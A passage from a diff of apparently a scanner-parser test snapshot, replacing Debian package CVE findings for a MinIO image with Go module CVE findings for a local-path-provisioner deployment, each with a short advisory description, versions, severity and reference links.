"https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "https://pkg.go.dev/vuln/GO-2023-1571", + "https://vuln.go.dev/ID/GO-2023-1571.json", + "https://www.cve.org/CVERecord?id=CVE-2022-41723", + ], + }, + "category": "Vulnerability", + "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "avoid quadratic complexity in HPACK decoding", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-41723", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2022-41723", + }, + { + "type": "URL", + "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + }, + { + "type": "URL", + "value": "https://go.dev/cl/468135", + }, + { + "type": "URL", + "value": "https://go.dev/cl/468295", + }, + { + "type": "URL", + "value": "https://go.dev/issue/57855", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4513", + "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", }, { "type": "URL", - "value": "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", }, { "type": "URL", - "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-36084.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", + "value": "https://pkg.go.dev/vuln/GO-2023-1571", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5391-1", + "value": "https://vuln.go.dev/ID/GO-2023-1571.json", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-36084", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-36085", - "installedVersion": "3.1-1", - "packageName": "libsepol1", + "fixedVersion": "0.0.0-20210428140749-89ef3d95e781", + "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-31525", + "installedVersion": "v0.0.0-20201021035429-f5854403a974", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-36085", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", - "https://errata.almalinux.org/8/ALSA-2021-4513.html", - "https://errata.rockylinux.org/RLSA-2021:4513", - "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", - "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", - "https://linux.oracle.com/cve/CVE-2021-36085.html", - "https://linux.oracle.com/errata/ELSA-2021-4513.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", - "https://ubuntu.com/security/notices/USN-5391-1", - "https://www.cve.org/CVERecord?id=CVE-2021-36085", + "https://access.redhat.com/security/cve/CVE-2021-31525", + "https://github.com/advisories/GHSA-h86h-8ppg-mxmh", + "https://github.com/golang/go/issues/45710", + "https://go.dev/cl/313069", + "https://go.dev/issue/45710", + "https://go.googlesource.com/net/+/89ef3d95e781148a0951956029c92a211477f7f9", + "https://groups.google.com/g/golang-announce/c/cu9SP4eSXMc", + "https://linux.oracle.com/cve/CVE-2021-31525.html", + "https://linux.oracle.com/errata/ELSA-2021-3076.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ISRZZ6NY5R2TBYE72KZFOCO25TEUQTBF/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-31525", + "https://pkg.go.dev/vuln/GO-2022-0236", + "https://security.gentoo.org/glsa/202208-02", + "https://www.cve.org/CVERecord?id=CVE-2021-31525", ], }, "category": "Vulnerability", - "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __verify_map_perm_classperms and hashtab_map).", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "net/http in Go before 1.15.12 and 1.16.x before 1.16.4 allows remote attackers to cause a denial of service (panic) via a large header to ReadRequest or ReadResponse. Server, Transport, and Client can each be affected in some configurations.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "libsepol: use-after-free in __cil_verify_classperms()", + "name": "golang: net/http: panic in ReadRequest and ReadResponse when reading a very large header", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-36085", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-36085", - }, - { - "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "value": "https://avd.aquasec.com/nvd/cve-2021-31525", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "value": "https://access.redhat.com/security/cve/CVE-2021-31525", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "value": "https://github.com/advisories/GHSA-h86h-8ppg-mxmh", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "value": "https://github.com/golang/go/issues/45710", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "value": "https://go.dev/cl/313069", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "value": "https://go.dev/issue/45710", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4513", + "value": "https://go.googlesource.com/net/+/89ef3d95e781148a0951956029c92a211477f7f9", }, { "type": "URL", - "value": "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", + "value": "https://groups.google.com/g/golang-announce/c/cu9SP4eSXMc", }, { "type": "URL", - "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", + "value": "https://linux.oracle.com/cve/CVE-2021-31525.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-36085.html", + "value": "https://linux.oracle.com/errata/ELSA-2021-3076.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ISRZZ6NY5R2TBYE72KZFOCO25TEUQTBF/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-31525", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", + "value": "https://pkg.go.dev/vuln/GO-2022-0236", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5391-1", + "value": "https://security.gentoo.org/glsa/202208-02", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-36085", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-31525", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-36086", - "installedVersion": "3.1-1", - "packageName": "libsepol1", + "fixedVersion": "0.4.0", + "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41717", + "installedVersion": "v0.0.0-20201021035429-f5854403a974", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-36086", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", - "https://errata.almalinux.org/8/ALSA-2021-4513.html", - "https://errata.rockylinux.org/RLSA-2021:4513", - "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", - "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", - "https://linux.oracle.com/cve/CVE-2021-36086.html", - "https://linux.oracle.com/errata/ELSA-2021-4513.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", - "https://ubuntu.com/security/notices/USN-5391-1", - "https://www.cve.org/CVERecord?id=CVE-2021-36086", + "https://access.redhat.com/errata/RHSA-2023:2367", + "https://access.redhat.com/security/cve/CVE-2022-41717", + "https://bugzilla.redhat.com/2092793", + "https://bugzilla.redhat.com/2161274", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "https://go.dev/cl/455635", + "https://go.dev/cl/455717", + "https://go.dev/issue/56350", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-41717.html", + "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "https://pkg.go.dev/vuln/GO-2022-1144", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-41717", ], }, "category": "Vulnerability", - "description": "The CIL compiler in SELinux 3.2 has a use-after-free in cil_reset_classpermission (called from cil_reset_classperms_set and cil_reset_classperms_list).", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "use-after-free in cil_reset_classpermission()", + "name": "excessive memory growth in a Go server accepting HTTP/2 requests", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-36086", + "value": "https://avd.aquasec.com/nvd/cve-2022-41717", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-36086", + "value": "https://access.redhat.com/errata/RHSA-2023:2367", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", + "value": "https://access.redhat.com/security/cve/CVE-2022-41717", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "value": "https://bugzilla.redhat.com/2092793", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "value": "https://go.dev/cl/455635", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "value": "https://go.dev/cl/455717", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4513", + "value": "https://go.dev/issue/56350", }, { "type": "URL", - "value": "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", }, { "type": "URL", - "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-36086.html", + "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", + "value": "https://pkg.go.dev/vuln/GO-2022-1144", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5391-1", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-36086", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-36087", - "installedVersion": "3.1-1", - "packageName": "libsepol1", + "fixedVersion": "0.0.0-20220412211240-33da011f77ad", + "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-29526", + "installedVersion": "v0.0.0-20200930185726-fdedc70b468f", + "packageName": "golang.org/x/sys", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-36087", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", - "https://errata.almalinux.org/8/ALSA-2021-4513.html", - "https://errata.rockylinux.org/RLSA-2021:4513", - "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", - "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", - "https://linux.oracle.com/cve/CVE-2021-36087.html", - "https://linux.oracle.com/errata/ELSA-2021-4513.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", - "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", - "https://ubuntu.com/security/notices/USN-5391-1", - "https://www.cve.org/CVERecord?id=CVE-2021-36087", + "https://access.redhat.com/security/cve/CVE-2022-29526", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", + "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "https://github.com/golang/go/issues/52313", + "https://go.dev/cl/399539", + "https://go.dev/cl/400074", + "https://go.dev/issue/52313", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "https://linux.oracle.com/cve/CVE-2022-29526.html", + "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "https://pkg.go.dev/vuln/GO-2022-0493", + "https://security.gentoo.org/glsa/202208-02", + "https://security.netapp.com/advisory/ntap-20220729-0001/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-29526", ], }, "category": "Vulnerability", - "description": "The CIL compiler in SELinux 3.2 has a heap-based buffer over-read in ebitmap_match_any (called indirectly from cil_check_neverallow). This occurs because there is sometimes a lack of checks for invalid statements in an optional block.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "libsepol: heap-based buffer overflow in ebitmap_match_any()", + "name": "faccessat checks wrong group", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-36087", + "value": "https://avd.aquasec.com/nvd/cve-2022-29526", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-36087", + "value": "https://access.redhat.com/security/cve/CVE-2022-29526", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "value": "https://github.com/golang/go/issues/52313", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "value": "https://go.dev/cl/399539", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "value": "https://go.dev/cl/400074", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "value": "https://go.dev/issue/52313", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4513", + "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", }, { "type": "URL", - "value": "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", }, { "type": "URL", - "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-36087.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", }, { "type": "URL", - "value": "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", + "value": "https://pkg.go.dev/vuln/GO-2022-0493", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", + "value": "https://security.gentoo.org/glsa/202208-02", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5391-1", + "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-36087", + "value": "https://ubuntu.com/security/notices/USN-6038-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-0563", - "installedVersion": "2.36.1-8+deb11u1", - "packageName": "libsmartcols1", + "fixedVersion": "0.3.7", + "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-38561", + "installedVersion": "v0.3.3", + "packageName": "golang.org/x/text", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-0563", - "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", - "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", - "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", - "https://security.netapp.com/advisory/ntap-20220331-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "https://access.redhat.com/security/cve/CVE-2021-38561", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", + "https://deps.dev/advisory/OSV/GO-2021-0113", + "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", + "https://go.dev/cl/340830", + "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", + "https://groups.google.com/g/golang-announce", + "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", + "https://pkg.go.dev/golang.org/x/text/language", + "https://pkg.go.dev/vuln/GO-2021-0113", + "https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2021-38561", ], }, "category": "Vulnerability", - "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "golang.org/x/text/language in golang.org/x/text before 0.3.7 can panic with an out-of-bounds read during BCP 47 language tag parsing. Index calculation is mishandled. If parsing untrusted user input, this can be used as a vector for a denial-of-service attack.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "name": "out-of-bounds read in golang.org/x/text/language leads to DoS", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-0563", + "value": "https://avd.aquasec.com/nvd/cve-2021-38561", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-0563", + "value": "https://access.redhat.com/security/cve/CVE-2021-38561", }, { "type": "URL", - "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", }, { "type": "URL", - "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "value": "https://deps.dev/advisory/OSV/GO-2021-0113", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "value": "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", + "value": "https://go.dev/cl/340830", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "value": "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb11u4", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4450", - "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "libssl1.1", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:2165", - "https://access.redhat.com/security/cve/CVE-2022-4450", - "https://bugzilla.redhat.com/1960321", - "https://bugzilla.redhat.com/2164440", - "https://bugzilla.redhat.com/2164487", - "https://bugzilla.redhat.com/2164492", - "https://bugzilla.redhat.com/2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", - 